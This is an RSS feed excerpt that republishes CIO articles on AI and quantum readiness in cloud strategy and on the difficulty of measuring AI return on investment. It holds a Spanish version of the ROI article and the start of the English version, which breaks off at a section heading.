<description><![CDATA[The strangest thing about cloud strategy is how confident it looks in PowerPoint and how nervous it feels in real life.



I’ve sat in rooms where the cloud slide looked clean enough to frame. Public cloud here. Private cloud there. Hybrid for the awkward middle child. Multi-cloud for resilience,...]]></description>
<link>https://tsecurity.de/de/3654083/it-security-nachrichten/ai-changed-our-cloud-strategy-quantum-changes-the-questions-behind-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654083/it-security-nachrichten/ai-changed-our-cloud-strategy-quantum-changes-the-questions-behind-it/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The strangest thing about cloud strategy is how confident it looks in PowerPoint and how nervous it feels in real life.</p>



<p>I’ve sat in rooms where the cloud slide looked clean enough to frame. Public cloud here. Private cloud there. Hybrid for the awkward middle child. Multi-cloud for resilience, bargaining power and the faint hope that no single vendor would ever own our sleep.</p>



<p>Then AI arrived.</p>



<p>At first, it looked like another conversation about workload. Bigger compute. More storage. Faster experiments. Some awkward cost questions. Nothing we couldn’t absorb with a thicker roadmap.</p>



<p>Then the bills landed. The data moved in odd ways. Teams built things before governance could find its shoes. Vendors became more central than anyone had admitted.</p>



<p>The old cloud strategy didn’t collapse. It blushed. AI exposed the assumptions beneath it.</p>



<p>Now, quantum changes something deeper. It asks whether the decisions behind the workload can survive time, secrecy, suppliers, weak evidence and uncertainty.</p>



<p>That’s a much less comfortable meeting.</p>



<h2 class="wp-block-heading">Cloud strategy was built for workloads we thought we understood</h2>



<p>For years, cloud strategy was a sensible debate about location, cost, control and speed. Public cloud for scale. Private cloud for sensitive workloads. Hybrid cloud for compromise. Multi-cloud for resilience, negotiation or, if we’re being honest, organizational politics with a nice diagram.</p>



<p>The logic was sound. Move faster. Cut heavy infrastructure spend. Improve recovery. Give developers what they need before they grow old waiting for a server. It worked because the work behaved in familiar ways. Systems had owners. Costs had patterns. Data had borders, or at least we pretended it did.</p>



<p>The question was simple: Where should this workload live? That question still matters. But it no longer carries enough weight.</p>



<p>AI changed that. AI changed the pattern, not just the platform AI didn’t politely join the cloud strategy. It wandered through the house, opened every cupboard and asked why the plumbing sounded tired.</p>



<p>The first shock was demand.</p>



<p>Traditional systems consume resources in ways you can usually model. AI workloads behave differently. Training, testing, inference and data processing can spike, pause, restart and spread before anyone has agreed on who owns the meter.</p>



<p>Cloud cost control used to ask a billing question, “How much will we use?” AI asks an operating question: “Who is allowed to create demand, at what scale, for what purpose and with whose approval?”</p>



<p>The second shock was data.</p>



<p>AI does more than store data. It chews it, reshapes it, remembers parts of it, produces new versions of it and leaves traces in places people forget to check. Prompts, logs, embeddings, model outputs, copied files and forgotten notebooks can become quiet risk pockets.</p>



<p>A cloud strategy that only asks where data sits misses how data behaves.</p>



<p>The third shock was supplier dependency.</p>



<p>Many firms thought they had a cloud strategy. AI revealed they had a supplier dependency strategy wearing a cloud badge. GPUs, model platforms, managed services, specialist APIs and third-party tools became central to delivery.</p>



<p>AI compressed the distance between idea and exposure. A team could test, connect and release faster than governance could form a working group. I say that with affection. I’ve seen working groups age in dog years.</p>



<p>Cloud strategy had become a test of decision speed, risk appetite, financial discipline and data control. It now goes beyond architecture.</p>



<p>Then quantum changed the clock.</p>



<h2 class="wp-block-heading">Quantum changes the time horizon</h2>



<p>Quantum risk often gets dumped into the cryptography drawer. That is understandable. It is also dangerous.</p>



<p>The leadership issue adds time to the future of quantum computers.</p>



<p>Some data stolen today may still matter years from now. Some secrets age badly. Trade secrets, legal records, health data, source code, identity data and sensitive contracts don’t all expire at the same speed. Some decay like fruit. Some sit like plutonium.</p>



<p>That is why “harvest now, decrypt later” matters. An attacker may collect encrypted data today and wait for better tools tomorrow. You don’t need to panic. You do need to ask which data has a long secrecy life.</p>



<p>If your most sensitive long-lived data spans cloud platforms, SaaS services, backups, archives, collaboration tools and supplier systems, where exactly is your quantum exposure? Which encryption protects it? Who manages the keys? Which supplier has a plan? Which one has a brochure?</p>



<p>A brochure is a scented candle for anxious executives.</p>



<p>Migration also takes time. Cryptography hides everywhere. In applications. In identity systems. In network devices. In APIs. In firmware. In backup tools. In old systems, nobody wants to touch.</p>



<p>Quantum readiness goes beyond a weekend patch. It is discovery, classification, design, testing, contracts, funding, sequencing and proof.</p>



<p>The risky sentence is, “We’ll revisit this when things become clearer.”</p>



<p>By then, the cheap decisions may have left the building.</p>



<h2 class="wp-block-heading">The real issue is decision infrastructure</h2>



<p>AI exposed assumptions about speed, cost, data and suppliers. Quantum exposes timing, ownership, evidence and memory. Together, they point to a quieter weakness: decision infrastructure.</p>



<p>By decision infrastructure, I mean the system by which leaders frame risk, assign ownership, make trade-offs, record choices, track evidence and revisit assumptions when facts change. That sounds dull. Good. Dull is where serious governance lives. The glamorous stuff gets applause. The dull stuff prevents regret.</p>



<p>Many organizations saw the risk and still failed because too many people saw different pieces of it, and nobody owned the decision. The cloud team sees architecture. Security sees exposure. Legal sees liability. Procurement sees contract gaps. Finance sees cost drift.</p>



<p>The board sees amber. Amber is often where hard decisions go to nap.</p>



<p>This is why AI and quantum belong in the same leadership conversation. AI asks whether your cloud strategy can keep pace. Quantum asks whether it can cope with time. Both punish vague ownership.</p>



<p>Who owns long-term cryptographic exposure? Who can force a supplier conversation? Who accepts residual risk if migration cannot happen fast enough? Who records why a decision was made and when it must be reviewed?</p>



<p>Suppose those questions feel awkward, good. Awkward questions earn their rent.</p>



<h2 class="wp-block-heading">The questions leaders should ask now</h2>



<p>The board needs better questions.</p>



<p>Start with exposure. What protects your most sensitive systems and data? Where do you rely on supplier-managed encryption? Which systems are old, critical, poorly documented and painful to change?</p>



<p>Exposure is a map of assets, data, dependencies and time.</p>



<p>Then ask about ownership. Who owns quantum readiness across cloud, cyber, legal, procurement, privacy, resilience and the business? Who can make trade-off decisions when risk reduction competes with cost and delivery? Which risks are stuck because everyone is involved and nobody is accountable?</p>



<p>Awareness without ownership is just anxiety with better stationery.</p>



<p>Then ask about evidence. Can you show progress by system, supplier, business service and data class? Would your evidence survive a board review, a regulator’s questioning or a post-incident investigation?</p>



<p>Evidence built under pressure is expensive. It is also sweaty. Build the proof trail before the room gets hot.</p>



<p>Finally, ask about timing. Which choices must be made now because migration will take years? What event would trigger faster action? When will the board revisit the risk?</p>



<p>Which delay would you regret if the timeline moves faster than expected?</p>



<p>That last question matters. Regret is often the most honest risk metric in the room.</p>



<h2 class="wp-block-heading">What a quantum-aware cloud strategy looks like</h2>



<p>A quantum-aware cloud strategy is not a glossy side document owned by three cryptographers and a nervous intern.</p>



<p>It is a cloud strategy with better questions built into it:</p>



<ol class="wp-block-list">
<li><strong>Build cryptographic visibility.</strong> Start with the services that matter most. Find the encryption, certificates, protocols, keys, libraries and suppliers that protect them. Perfection can wait. Blindness cannot.</li>



<li><strong>Classify data by secrecy life.</strong> Not just sensitivity. Time. How long must this information stay protected? A short-lived report and a long-life trade secret do not belong in the same queue.</li>



<li><strong>Press suppliers for evidence.</strong> Ask what they are doing, what you must do and how they will prove progress. Confidence is lovely. Evidence pays the rent.</li>



<li><strong>Rank migration by risk.</strong> Start where business value, long-life data, weak visibility and migration pain meet. Treating everything as equal is how serious work becomes theatre.</li>



<li><strong>Change board reporting.</strong> Don’t report quantum as a foggy science project. Report decisions required, risks accepted, blockers, supplier gaps and review dates. Boards govern choices. Give them choices.</li>



<li><strong>Build a review rhythm.</strong> Standards, tools, suppliers, threats and regulations will continue to evolve. A stale roadmap is just a risk register wearing a lab coat.</li>
</ol>



<p>No panic. Panic burns energy and produces bad slides. The aim is readiness with owners, evidence and judgment.</p>



<h2 class="wp-block-heading">The cloud question grew up</h2>



<p>Cloud strategy began as an architecture question.</p>



<p>AI turned it into an operating question. Quantum turns it into a leadership question.</p>



<p>That is the shift.</p>



<p>To handle this well, organizations will need to build decision muscle early. They will know what matters, who owns it, what evidence exists, which suppliers are ready and when the next decision must be made.</p>



<p>But beneath cloud, AI and quantum sits the discipline leaders often avoid until pressure arrives, wearing a suit: decision quality.</p>



<p>AI changed the cloud bill. Quantum changes the clock.</p>



<p>And the clock is where risk hides.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[¿Por qué resulta tan difícil medir el ROI de la IA?]]></title>
<description><![CDATA[La multinacional farmacéutica danesa Novo Nordisk está muy interesada en acelerar el tiempo que se tarda en lanzar medicamentos al mercado a medida que expiran las patentes. “Si tienes un medicamento superventas, un retraso de una semana puede suponer entre 10 y 100 millones de dólares”, afirma S...]]></description>
<link>https://tsecurity.de/de/3654011/it-security-nachrichten/por-qu-resulta-tan-difcil-medir-el-roi-de-la-ia/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654011/it-security-nachrichten/por-qu-resulta-tan-difcil-medir-el-roi-de-la-ia/</guid>
<pubDate>Wed, 08 Jul 2026 12:53:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>La multinacional farmacéutica danesa Novo Nordisk está muy interesada en acelerar el tiempo que se tarda en lanzar medicamentos al mercado a medida que expiran las patentes. “Si tienes un medicamento superventas, un retraso de una semana puede suponer entre 10 y 100 millones de dólares”, afirma Stephanie Bova, responsable de transformación digital de la empresa. “Es una cantidad enorme, porque dispones de menos tiempo de protección mediante patente”.</p>



<p>La IA generativa ofrecía la posibilidad de acelerar drásticamente múltiples etapas del proceso de desarrollo de medicamentos. Y, dado que Novo Nordisk ya llevaba un seguimiento minucioso de la duración de sus procesos clave, contaba con una ventaja de la que carecían muchas otras empresas. Por lo tanto, debería haber sido relativamente sencillo incorporar un poco de IA generativa, ver cómo mejoraba la productividad y observar cómo llegaban los beneficios. Pero no fue tan fácil. El proceso de desarrollo de un fármaco consta de muchas partes, que tienen lugar en distintos momentos y en distintos departamentos. “Las personas son expertas en sus propios ámbitos, pero no necesariamente conocen el siguiente ámbito ni cómo encaja todo. El sistema es tan grande y complejo que no se puede ver todo el rendimiento de una sola vez”, afirma Bova.</p>



<p>Es posible que la documentación de los procesos no se corresponda con lo que la gente hace realmente en la práctica, y que diferentes personas realicen la misma tarea de formas distintas. Además, algunas tareas cruciales pueden pasar prácticamente desapercibidas desde fuera. El equipo de fabricación, por ejemplo, puede formar parte de un grupo completamente diferente y no ser consciente de que el medicamento se está preparando para su presentación ante la FDA (la agencia gubernamental estadounidense del medicamento), y que aún no tiene toda la documentación lista. “Así que has avanzado muy rápido solo para tener que esperar a que ellos te alcancen”, añade Bova.</p>



<p>Este es solo uno de los muchos retos a los que se enfrentan las empresas al intentar medir los resultados de los proyectos de IA, y la razón por la que las encuestas son tan contradictorias.</p>



<p>Si nos fijamos en las tareas individuales, Novo Nordisk puede demostrar mejoras en la productividad y claros beneficios positivos derivados del uso de la IA. Pero si damos un paso atrás y analizamos los resultados financieros de la empresa, el panorama se vuelve más confuso. En primer lugar, si se omiten pasos críticos, el tiempo de comercialización no mejorará. Además, un nuevo medicamento tarda años en llegar a los clientes, por lo que los efectos positivos en los resultados no se notarán hasta pasado un tiempo. Y eso es solo el principio del problema que plantea la medición del retorno de la inversión.</p>



<h2 class="wp-block-heading">Medición de procesos</h2>



<p>Para abordar los puntos ciegos de sus procesos, Novo Nordisk recurrió a la nueva generación de minería de procesos: gemelos digitales de las operaciones en tiempo real impulsados por IA. “Nos asociamos con la empresa de inteligencia de procesos Celonis para obtener un gemelo digital de nuestros datos de procesos. Fuimos los primeros del sector en aplicarlo al ámbito clínico”, explica Bova. La herramienta recopila información de los sistemas de la empresa para hacer un seguimiento de lo que los empleados hacen realmente, en lugar de utilizar encuestas para recabar información sobre lo que una parte de los empleados recordaba haber hecho en algún momento.</p>



<p>El primer proyecto consistió en un proceso sencillo de siete pasos y, al crear un gemelo digital del mismo, Novo Nordisk descubrió que, dependiendo de quién lo llevara a cabo, podía tratarse de un proceso de cinco o de nueve pasos. “Si reúnes a diez expertos en la materia en una sala, obtienes todo tipo de interpretaciones y, con el tiempo, se producen desviaciones”, cuenta.</p>



<p>El proyecto puso de manifiesto múltiples fallos en los procesos existentes. En algunos casos, fue necesario volver a formar a los empleados. En uno de ellos, hubo que actualizar la interfaz de usuario. Sin embargo, una vez que se estandariza un proceso, surge la oportunidad de tomar una “fotografía” de la situación anterior, de modo que haya algo con lo que comparar posteriormente y comprobar si la mejora mediante IA o la automatización arrojan algún resultado.</p>



<p>Otra cuestión que tuvieron que resolver de antemano fue decidir qué hacer con el tiempo ahorrado que se generara. “No quieres despedir a nadie”, afirma Bova. “Se trata de personal altamente cualificado y difícil de encontrar. Quizá deberíamos plantearnos redistribuir un poco los equipos”.</p>



<p>En la actualidad, la empresa cuenta con varios cientos de agentes de IA en funcionamiento, etiquetados dentro de la infraestructura del gemelo digital para poder identificarlos. “Si algo falla, sabemos exactamente dónde solucionarlo”, dice, y añade que la siguiente fase es la coordinación entre múltiples agentes. “Hoy en día, los tenemos conectados, pero no contamos con ‘agentes de agentes”.</p>



<p>Aún es demasiado pronto para saber si hay retorno de la inversión, ya que, en el desarrollo de fármacos, el proceso lleva años. “Pero, al analizar el proceso de principio a fin, espero que podamos recortar dos años del ciclo de desarrollo. Dos años menos hasta la comercialización, en comparación con la situación actual”»”, indica.</p>



<p>Los medicamentos que ya se encuentran en la fase final de desarrollo no experimentarán una aceleración tan notable, pero los que acaban de iniciarse serán los que más se beneficien. Sin embargo, los resultados finales no se verán hasta dentro de varios años.</p>



<p>La industria farmacéutica no es la única en la que el verdadero valor proviene de la optimización simultánea de múltiples procesos interconectados. <a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html" target="_blank" rel="nofollow">Según PwC</a>, los proyectos tácticos de IA a menudo no aportan un valor cuantificable, y los beneficios tangibles provienen de implementaciones a escala empresarial coherentes con la estrategia de negocio.</p>



<p>De hecho, muchas empresas no han experimentado ni un aumento de los ingresos ni una reducción de los costes gracias a la IA en los últimos 12 meses, a pesar de su adopción casi universal. Aun así, el gasto empresarial en IA se prevé que casi se duplique a finales de año en comparación con el año pasado, según <a href="https://kpmg.com/us/en/media/news/q1-ai-pulse2026.html" target="_blank" rel="nofollow">KPMG</a>.</p>



<h2 class="wp-block-heading">Medición de la productividad</h2>



<p>La mayoría de las empresas empiezan a pequeña escala, implantando <em>chatbots </em>de IA para los empleados con el fin de ayudar a mejorar la productividad. Y el ritmo de adopción en este ámbito ha sido asombrosamente alto, solo equiparado por la incapacidad de medir las ganancias de productividad que se supone que se deben alcanzar.</p>



<p>Disponer de una referencia es clave, afirma Anand Rao, profesor de IA en la Universidad Carnegie Mellon, de Estados Unidos, pero en algunos casos resulta difícil de medir y, en otros, es prácticamente imposible. Tomemos, por ejemplo, las decisiones relacionadas con los seguros, en las que los resultados pueden tardar años en hacerse evidentes. En el caso de los seguros de vida, podrían ser décadas, afirma. Y para algunos tipos de decisiones, las empresas no disponen de ningún tipo de indicador.</p>



<p>“Existe un estigma social a la hora de decir que estoy tratando de analizar tu proceso de toma de decisiones y lo bien que las estás tomando. Como seres humanos, no nos gusta que se evalúen nuestras decisiones”, señala. Luego, cuando una decisión sale bien al final, la gente se atribuye encantada el mérito. “Si la decisión sale mal, se achaca a factores externos”.</p>



<p>Pero incluso en el caso de tareas específicas en las que es posible realizar mediciones, las empresas a menudo no se esfuerzan por llevarlas a cabo antes de implementar herramientas de IA. “No partimos de una referencia”, apunta Julie Averill, antigua vicepresidenta ejecutiva y directora de sistemas de información global de la cadena de moda Lululemon. Averill es ahora directora general de Gold Thread, una consultora de transformación digital. “Partimos de la suposición de que la IA iba a ayudar a la gente a tomar mejores decisiones. Y eso te lleva a no poder medir bien los resultados”, explica.</p>



<p>Existen métricas alternativas que una empresa puede tener en cuenta en su lugar, añade, como las tasas de uso o la satisfacción de los usuarios. “Esto está ocurriendo y está aportando beneficios, algunos de los cuales se pueden ver y otros no. Hay que confiar en el proceso. Es igual que con la nube. Sabes que es el camino del futuro y puedes ver las ventajas, pero es difícil llegar hasta allí, y se requieren muchos cambios. Pero cuanto antes lo hagas, antes te habrás adaptado a la nueva forma de operar y podrás sacarle realmente partido”.</p>



<p>Hay otras áreas en las que es más fácil disponer de métricas concretas, como el servicio de atención al cliente. “Se trata de tareas repetitivas y suele ser el primer ámbito que las empresas automatizan con IA. Hay resultados muy tangibles que se pueden medir y se puede establecer una referencia muy sólida”, explica Averill.</p>



<p>Lululemon también lleva años utilizando la IA para mejorar la personalización y las recomendaciones, y esa es otra área que se puede cuantificar. Además, la automatización puede reducir la introducción manual de datos, lo que disminuye las tasas de error. La IA también se puede utilizar para ayudar en la supervisión del cumplimiento normativo, la detección de fraudes y el mantenimiento predictivo de los equipos, todos ellos casos de uso que se pueden cuantificar.</p>



<p>¿Pero la productividad de los empleados en general? Eso es difícil de medir, y no solo para Lululemon. Una forma obvia podría ser analizar los despidos en profesiones expuestas a la IA. Al fin y al cabo, los titulares están por todas partes. Pero en <a href="https://www.anthropic.com/research/labor-market-impacts" target="_blank" rel="nofollow">un informe publicado en marzo</a>, Anthropic no encontró indicios de un aumento del desempleo en las profesiones altamente expuestas, aquellas en las que las personas tienen más probabilidades de ser despedidas debido a la IA.</p>



<p>A principios de 2025, la empresa de investigación METR intentó cuantificar la productividad de los desarrolladores comparando la rapidez con la que los desarrolladores experimentados eran capaces de realizar tareas con IA y sin ella. ¿El resultado? Los desarrolladores afirmaron que esperaban que la IA les permitiera trabajar un 24% más rápido y estimaron que, en realidad, la IA les había permitido hacerlo un 20 % más rápido. Pero los datos revelaron una realidad totalmente diferente. El uso de la IA, en realidad, les ralentizó un 19%.</p>



<p>Por supuesto, las herramientas de IA están mejorando. METR intentó realizar un estudio de seguimiento, comparando de nuevo las tareas realizadas con y sin IA, pero no pudo encontrar suficientes desarrolladores dispuestos a volver al enfoque sin IA, a pesar de que los investigadores les pagaban por participar en el estudio.</p>



<p>Existen casos anecdóticos de empresas en las que un solo ingeniero realiza el trabajo de cien gracias al uso de la IA. O aquella vez en que se filtró accidentalmente todo el código fuente de Claude Code, de medio millón de líneas, y el desarrollador coreano Sigrid Jin creó una reconstrucción desde cero en dos horas, que luego subió a GitHub, donde se convirtió en el proyecto más rápido de la historia en alcanzar las 100.000 estrellas.</p>



<p>Pero, como ocurre con cualquier otro tema relacionado con la IA, la realidad es más compleja. En el caso concreto del desarrollo de software, escribir el código es, en realidad, solo una pequeña parte de lo que implica desarrollar software.</p>



<p>La consultora DX analizó recientemente métricas clave de ingeniería de 400 empresas y, en un informe reciente, constató que el uso de la IA había aumentado un 65% desde noviembre de 2024, pero que la productividad relacionada con la IA se situaba justo por debajo del 10%.</p>



<h2 class="wp-block-heading">Costes ocultos</h2>



<p>Al igual que resulta difícil medir los beneficios de la IA en términos de productividad, también puede resultar complicado cuantificar los costes. Cuando una empresa empieza a utilizar la IA, los costes pueden ser relativamente fáciles de estimar. ¿A cuánto ascienden las cuotas mensuales totales de suscripción a los chatbots de IA que utilizan los empleados? ¿Cuál es el coste de entrenar o ajustar un modelo personalizado? Pero cuando se pasa a casos de uso más complejos, los cálculos se vuelven más difíciles, afirma Averill. “Ahora existen todos los sistemas relacionados con la IA. Esos son más difíciles de cuantificar, pero su impacto es mayor”, dice.</p>



<p>Por ejemplo, si la IA se integra en los procesos empresariales mediante RAG, existe el gasto continuo de las llamadas a la API, pero también los cambios que hay que realizar en otros sistemas, explica. Y la cosa se complica cada día más. “No hemos realizado un esfuerzo muy concertado para implantar la telemetría y la instrumentación”, afirma Swaminathan Chandrasekaran, director global de IA y laboratorios de datos en KPMG. Según él, obtener una visión global de los costes totales de la IA en una empresa es como predecir el tiempo.</p>



<p>“La razón por la que contamos con un sistema de predicción meteorológica tan impresionante en este país es que disponemos de decenas de miles de estaciones meteorológicas que recopilan datos”, explica. “Sin eso, no sabríamos qué tiempo va a hacer”.</p>



<p>Las empresas deben implantar sistemas de medición para evaluar todos los aspectos del consumo relacionado con la IA, señala, empezando por el número de tokens utilizados, quién los utiliza y cómo se correlaciona esto con el rendimiento laboral. “Esa medición brilla por su ausencia”, afirma.</p>



<p>Al menos cuando los humanos utilizan <em>chatbots </em>de IA, hay un límite en el número de preguntas que son físicamente capaces de formular, además de unos costes de suscripción predecibles. Y cuando los procesos empresariales se habilitan con IA a través de RAG, las llamadas a la API de los modelos de lenguaje grandes (LLM) las realizan sistemas empresariales predecibles y programados de forma tradicional.</p>



<p>Pero ahora, la IA agentiva está empeorando aún más las cosas, ya que los agentes pueden actuar de forma impredecible y el número de llamadas a la API puede dispararse rápidamente fuera de control. En un informe del <a href="https://www.bcg.com/publications/2026/how-leaders-build-an-ai-first-cost-advantage" target="_blank" rel="nofollow">Boston Consulting Group</a>, dos tercios de las empresas señalan gastos de escalado de la IA incontrolables.</p>



<p>Otro coste que algunas empresas quizá no prevean bien, o que no controlen porque forma parte de un presupuesto diferente, es el relacionado con los datos. Ya sea preparando datos para el entrenamiento o el ajuste fino, utilizando incrustaciones de RAG o configurando el acceso directo a MCP a través de agentes, estos costes pueden acumularse rápidamente cuando entra en escena la IA.</p>



<p>“Las tarifas de salida son uno de los gastos más importantes”, afirma Tom Coughlin, miembro del IEEE y presidente de la consultora Coughlin Associates. “Si tienes que sacar datos de la nube, esas tarifas de salida podrían ser considerables”. Además, están todos los costes de personal que conlleva la implementación de la IA, añade.</p>



<p>“A largo plazo, la IA aportará un gran valor a las personas, pero estas deben saber cómo utilizarla correctamente. Si no cuentan con esas habilidades, se encontrarán en desventaja”, expone.</p>



<h2 class="wp-block-heading">Soluciones y mensajes contradictorios</h2>



<p>Luego está la cuestión de resolver los problemas. La mayoría de las empresas han sufrido al menos un incidente relacionado con la IA en los últimos 18 meses, y la mayoría de ellos han supuesto pérdidas económicas, algunas de más de 500.000 dólares. Además, está la IA que se está integrando en todo.</p>



<p>“Conocemos nuestros costes directos”, afirma Andrew Johnson, director de sistemas de información (CIO) de Brownstein Hyatt Farber Schreck, un bufete de abogados estadounidense. “Pero donde resulta más difícil de cuantificar es con las plataformas que ya tenemos implantadas y las aplicaciones SaaS que no contaban con capacidades de IA. Nos piden aumentos extraordinarios y los atribuyen a las nuevas capacidades que aporta la IA. ¿Cuánto se le debe atribuir a la IA? Eso es un poco difuso”, relata.</p>



<p>Incluso cuando la IA permite ahorrar dinero, a menudo hay costes adicionales asociados a ello. Por ejemplo, el bufete gastaba unos 70.000 dólares al año en una plataforma de gestión de contratos. Desarrollar su propia versión con IA supuso unos 40.000 dólares en costes de mano de obra y otros 3.000 dólares al año en alojamiento. El mantenimiento continuo será mínimo para esa aplicación en concreto, añade, lo que supondrá un total de otros dos mil dólares al año.</p>



<p>Pero también hay otros costes indirectos asociados al funcionamiento de las aplicaciones propias, como las auditorías de seguridad, las evaluaciones de vulnerabilidad, las pruebas de penetración y la revisión del código. “Cuanto más compleja y arriesgada es la plataforma, menor es el interés por intentar crear una solución interna”, indica.</p>



<p>Aun así, el equipo de desarrollo de software es ahora mucho más productivo gracias a la IA, ya que cuatro o cinco desarrolladores son capaces de hacer el trabajo de 20 o 30. Pero las mejoras en la productividad no se traducen en un ahorro de mano de obra, ya que los desarrolladores tienen mucho trabajo nuevo que hacer. “Tenemos una enorme lista de oportunidades pendientes para desarrollar soluciones”, afirma.</p>



<p>La tendencia del trabajo a expandirse para ocupar todo el tiempo disponible no se da solo en el desarrollo de software, señala Rao, de Carnegie Mellon. Supongamos, por ejemplo, que se espera que la IA suponga una mejora del 20% en la productividad, explica. “Antes había cien personas haciendo ese trabajo, y ahora solo necesitamos 80. Pero, al final del año, la plantilla no ha cambiado. «En las tareas que realizaban, hay una mejora, añade, “pero las personas añadirán tareas para suplir o complementar ese 20%. No es que se vayan a casa una hora antes, sino que están encontrando otras actividades que generan valor”.</p>



<p>De hecho, en algunos casos, el aumento de la productividad en una empresa puede llegar a perjudicar los resultados. Los abogados, por ejemplo, cobran por horas. “La eficiencia va en contra de nuestras formas tradicionales de ganar dinero”, afirma Johnson, de Brownstein. “Tenemos que pensar más allá de eso. No es perjudicial para nuestros intereses a largo plazo, pero supone un reto a corto plazo. Sin embargo, si no lo hacemos, es probable que no seamos competitivos a medio y largo plazo”.</p>



<p>Así pues, si una nueva herramienta de IA ayuda a un abogado en la diligencia debida, no existe una relación directa entre la inversión en esa herramienta y el aumento de los ingresos. “Es un hecho que la dirección es la correcta”, afirma Johnson. “Pero no podemos afirmar que vaya a generar un rendimiento concreto”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why is it so hard to measure the ROI of AI?]]></title>
<description><![CDATA[Danish multinational pharmaceutical Novo Nordisk is very interested in speeding up the time it takes to get drugs to market as patents expire. “If you have a blockbuster drug, a one-week delay can be $10 to $100 million,” says Stephanie Bova, the company’s digital transformation officer. “It’s ma...]]></description>
<link>https://tsecurity.de/de/3653926/it-security-nachrichten/why-is-it-so-hard-to-measure-the-roi-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653926/it-security-nachrichten/why-is-it-so-hard-to-measure-the-roi-of-ai/</guid>
<pubDate>Wed, 08 Jul 2026 12:08:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Danish multinational pharmaceutical Novo Nordisk is very interested in speeding up the time it takes to get drugs to market as patents expire. “If you have a blockbuster drug, a one-week delay can be $10 to $100 million,” says Stephanie Bova, the company’s digital transformation officer. “It’s massive money because you have less time on patent.”</p>



<p>Gen AI offered the possibility of dramatically speeding up multiple steps in the drug development process. And since Novo Nordisk was already carefully tracking how long its key processes took, it had an advantage that many companies didn’t. So it should’ve been relatively simple to sprinkle in some gen AI, see productivity improve, and watch the money roll in. But it wasn’t that easy. A drug development process has many parts, happening at different times in different departments.</p>



<p>“People are experts in their own domains but don’t necessarily know the next domain and how it all fits together,” Bova says. “The system is so big and complex that you’re not able to see all the performance at once.”</p>



<p>Process documentation might not match what people actually do in practice, and different people might do the same task in different ways. And some crucial tasks might be nearly invisible from the outside. The manufacturing team, for example, might sit in a completely different group and not be aware the drug is getting ready for FDA submission, and don’t have all their documents ready yet.</p>



<p>“So you’ve run very fast only to have to wait for them to catch up,” Bova adds.</p>



<p>This is just one of many challenges companies face when trying to measure the results of AI projects, and why surveys are so contradictory.</p>



<p>Looking at individual tasks, Novo Nordisk can show productivity improvements and clear positive benefits to its use of AI. But stepping back and looking at the company’s bottom line, the picture gets murkier. First, if critical steps are missed, then time to market won’t improve. It also takes years for a new drug to get to customers, so any positive bottom-line effects won’t be felt for a while. And that’s just the start of the <a href="https://www.cio.com/article/4159823/ai-doesnt-create-roi-organizations-do.html?utm=hybrid_search">ROI measurement problem</a>.</p>



<h2 class="wp-block-heading">Process measurement</h2>



<p>To address its process blind spots, Novo Nordisk turned to the new generation of process mining: AI-powered real-time digital twins of operations.</p>



<p>“We partnered with process intelligence company Celonis to get a digital twin of our process data,” Bova says. “We were the first in the industry to apply it to the clinical setting.” The tool collects information from enterprise systems to track what employees actually do, rather than using surveys to collect information on what a fraction of employees remembered doing at some point.</p>



<p>The first project was a simple, seven-step process, and in creating a digital twin of it, Novo Nordisk discovered that, depending on who was doing it, it could be a five- or nine-step process. “If you get 10 different subject matter experts in a room, you get all kinds of interpretations, and you have drift over time,” she says.</p>



<p>The project exposed multiple flaws in existing processes. In some cases, employees needed to be retrained. In one, the user interface had to be updated. Once a process is standardized, though, there’s an opportunity to take the before picture, so there’s something to compare to afterward, to see if the AI augmentation or automation show any results.</p>



<p>Another thing they had to figure out ahead of time was decide what to do with any time savings that showed up.</p>



<p>“You don’t want to lay people off,” Bova says. “These are highly technical, hard-to-find talent. Maybe we want to think about redistributing teams a bit.”</p>



<p>Today, the company has several hundred AI agents in active deployment, tagged inside the digital twin infrastructure so they can be identified.</p>



<p>“If something screws up, we know exactly where to fix it,” she says, adding that the next phase is multi-agent orchestration. “Today, we have them connected, but we don’t have agents of agents.”</p>



<p>It’s too early to say if there’s ROI yet because, for drug development, the process takes years. “But by looking at the end-to-end process, my hope is we’ll find two years of cycle time to engineer out,” she says. “Two years quicker to market, compared to where we are now.”</p>



<p>Drugs that are already in the final phase of development won’t see as much acceleration, but those just starting out will benefit the most. The bottom line results, however, won’t show up for several years.</p>



<p>The pharmaceutical industry isn’t the only one where true value comes from optimizing multiple interconnected processes at once. <a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html" rel="nofollow">According to PwC</a>, tactical AI projects often don’t deliver measurable value, with tangible returns coming from enterprise-scale deployments consistent with business strategy.</p>



<p>In fact, many companies have seen neither increased revenue nor decreased costs from AI in the last 12 months despite nearly universal adoption of AI. Still, enterprise spending on AI is set to nearly double by the end of the year compared to last year, according to <a href="https://kpmg.com/us/en/media/news/q1-ai-pulse2026.html" rel="nofollow">KPMG</a>.</p>



<h2 class="wp-block-heading">Productivity measurement</h2>



